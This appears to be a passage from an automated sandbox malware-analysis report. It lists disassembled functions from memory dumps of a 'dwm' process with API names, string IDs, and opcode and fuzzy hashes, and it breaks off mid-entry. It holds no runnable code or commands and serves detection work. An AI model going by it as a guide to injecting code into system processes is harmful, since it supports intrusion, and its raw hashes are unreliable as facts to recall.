                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: 2E81A2217102418BFB95AB65984D39973F4AB89BC0F344629A9CD877D6FB38C846C733
                                                              Function 000002BAAEDB9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction ID: b05ef956670bd302dd0a0fb31d369ee465097333259fc5884794a577ccee6759
                                                              • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction Fuzzy Hash: DB31C621313A80E1FE12DB52A44875933B4B748BA0F7985259DAD8B795FF39C445C332
                                                              Function 000002BAAEDC3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction ID: c103a6854b8a70f28306447e3d34d58de77d583ad8356fd16e32a0e9b6833d34
                                                              • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction Fuzzy Hash: 76118F31310B4086E7518B62E84831977B4F7D8FE5F244225EAAE87794CF38C814C755
                                                              Function 000002BAAEDB2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction ID: b4e7113ac97cd805b81095e0493cadafcf47825dfa3655d525e6d7668856a1bf
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: 02319C22701B5582FA15DF2BA94872A77B0FB89B84F284024EF8C47B55FF38C4A1C321
                                                              Function 000002BAAEDBCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: 36a7adadae6223d38e70cee5f859879e305683998fa665f55c63ad91bf6a8947
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: 2E11872070164442FA646731959D3793371AB89BF4F344729E8BE8B7D6FF68C401C622
                                                              Function 000002BAAEDB199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: c3c061686a9f4d6c40d9f73f8a0e0548e45cf31374e2fd65256224889d573f59
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: C0015721300A4082EA10DB62A89835973B1F788FC1FA84035DE9D43799EF3CC98AC761
                                                              Function 000002BAAEDB36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: 0a8f289b4ece5fbd2f7dd2b7136c622ab5b077574d328cc1a262d6f8e34e5a78
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: EA011365212B40C6FB259B26E84C71A73B0FB89F86F240429CA9D477A5EF3DC508D722
                                                              Function 000002BAAEDB8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction ID: 6585090b02c8fd38e2777a7193b3482e37e35b76c2cc21499506e668385bdf3a
                                                              • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction Fuzzy Hash: E951BB327116808AFB15CF25E84CB5937BAF384BC8F308524EA9A47788FB35D841D722
                                                              Function 000002BAAEDB1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: FinalHandleNamePathlstrlen
                                                              • String ID: \\?\
                                                              • API String ID: 2719912262-4282027825
                                                              • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction ID: abd07548ff88367f9755c1adfe7ef801ed058170e281856db48bb5b91e843581
                                                              • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction Fuzzy Hash: E7F04F2231464192FB618F21F8C87597771F788BC8FA44024DA9D46959EF3CC68ECB11
                                                              Function 000002BAAEDB3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CombinePath
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3422762182-91387939
                                                              • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction ID: 63ca7292980f43a4695d6e483b8f44f8f1ae51bed5b3d18173750333c0550f63
                                                              • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction Fuzzy Hash: 69F05820604B8082EA018F22B9081197370AB88FC0F288130EE9E07B28DF2CC45AC761
                                                              Function 000002BAAEDBBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: e17a2a8abfaf183451db6cab14de92803af4f19fdc4b79774ad53cdbfa3d579d
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 42F01D61211A0581FB158B35E85C3697370EBC9BA1F640219DAEE462E4DF3DC549C761
                                                              Function 000002BAAEDB5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                              • Instruction ID: 4fca6f42a3aeef7dc5d99a525cc9c016d47ec52870089f8190fc5fc3ccc0cd78
                                                              • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                              • Instruction Fuzzy Hash: 7D61C936619B44C6FB609B55F48831AB7B1F388784F20151AEACE87BA8EB7CC445CF11
                                                              Function 000002BAAEDC4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 6bc235c89dd4ba3b8c409170830ba7392cc6228100ad2c77432cd73ac4771f79
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: B7117322A20F5111F6A61678D45E3653B716BF83F8F3A4724B9FE0B6D6CB24C841D622
                                                              Function 000002BAAED93504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 1d4ef6f58583843f2780835ecac2a0061c0005580cfd8b3f41c64f8d47db7e18
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: CE11A726610E5112FAD81568EC4D36933A06B5C374FB84638A9EF47FE6FB36CC41C122
                                                              Function 000002BAAED8F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                              • API String ID: 3215553584-4202648911
                                                              • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction ID: 81023ecb0820910d9cf7ed547905de8e0e1e4d0ddc1e2f86d72eb8229dc9630a
                                                              • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction Fuzzy Hash: DE61AE3660068886FA699B69E64C33A7BB1E785780F704525CADE07BE5DB34C942C333
                                                              Function 000002BAAEDBAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 1441ce3c8d924cdc05ca5cc0448591c8280f2adad06f1e54d30d3acb40ad4fbc
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 34614636604B848AFB20DF65D48479D77B0F348B88F244215EF8D1BB98EB38D595C721
                                                              Function 000002BAAEDBAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: c951c735cd728538b777dc87e1178026a2fe3a35e3e60ccda62af9195dcdea1a
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 43518E72204380CAFB748F25958839D77B0F358B85F285216EADD8BBD5EB38D491CB12
                                                              Function 000002BAAED8A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 3d0e4dc9f69d116a69a1e04c6b88ec57dd345acb4f90f601182f81ccd708a133
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 1A515B321046C0CAEBB48BA6954837D77B0F365B94F289216DADD8BBD5CB38D491CB12
                                                              Function 000002BAAED88405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: bfe5eb3d9197eb9fe7630dd13c2fdbd57141f2be83de8ef8ce1466eed62048fc
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 4451DE3A7012808AEB14DF15E408B3937B5F350B98FB18566DA8E63B88EB35CC41C726
                                                              Function 000002BAAED883E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: ce1ec2d10bd408fbb4e1b43acc9849800e3f156cc7cb3c1caa3b35821c2638a4
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: 7431B13A201780DAE714EF15E848B2977B5F740B98FA58424EEDF17B88DB39C941C726
                                                              Function 000002BAAEDC2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction ID: 1a20e79f6ef8153befe1d0df1db048902042e9da20d506d9208d6c4e0a4957e5
                                                              • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction Fuzzy Hash: 2DD1BF32B14A80CAE712CFB9D44829C3BB6F394BD8F248216DE9D97B99DB34C506C351
                                                              Function 000002BAAEDB14A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free
                                                              • String ID:
                                                              • API String ID: 3168794593-0
                                                              • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction ID: 86bf52ea889e7902f67d83ede30c2329e68bb4db53304ce25c0290c24fa7312b
                                                              • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction Fuzzy Hash: C1118B76900A90CAE716DFB2A80814977B0F789FC2F294025EBAD03756DF38C050C751
                                                              Function 000002BAAEDC2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction ID: f80f4d2cf748f4e5136c89bb4fe743ee3a095eb48e74bc370453a9d580881d64
                                                              • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction Fuzzy Hash: 0691C132700A5089F762DF7D94883AD3BB5B794BC8F344119DE8E67A98DB35C482C722
                                                              Function 000002BAAEDB7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: b31ded150e3051e41e268648a384d06e1058013ecd71d70e61595cb510ffbebd
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: 08113C22711F058AEF00DF70E8583A833B4F759B58F540E25EAAD867A8DF78C198C391
                                                              Function 000002BAAEDB253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: d4a1db6d941a9e24dee58ad62761dacc7528e04d884a64fa8a3e9228776e050a
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: 6071C03720078186F7659E2E98583AA77B4F389BC4F640026DE8E53B89FF35C645C716
                                                              Function 000002BAAED89E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 52e7a4fe5a1ad37d55796d6e8307dc892d3c612185be3856783d69c5e1161c58
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: A5617637A01B848AEB21DF65D4843AD7BB0F348B88F248215EF8D17B98DB38D595C711
                                                              Function 000002BAAEDB2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: c6f487bb5e8b81d71599e2ee1ff1cd92555f69ade49a330ce0838babf98a862f
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: 2D51DF2320838185F6659A2DA49C3AFB7B1F395B80F640125DEDE03B99FB39C504C762
                                                              Function 000002BAAEDC26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: 992df31dfa45ee89665b61984f332203c37cc16d3da8535cb90ddab8a2c78d4c
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: 7841C432315A8086EB21DF79E8483AA77B0F798BD4F604125EE8D87798EB3CC441C751
                                                              Function 000002BAAEDB94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
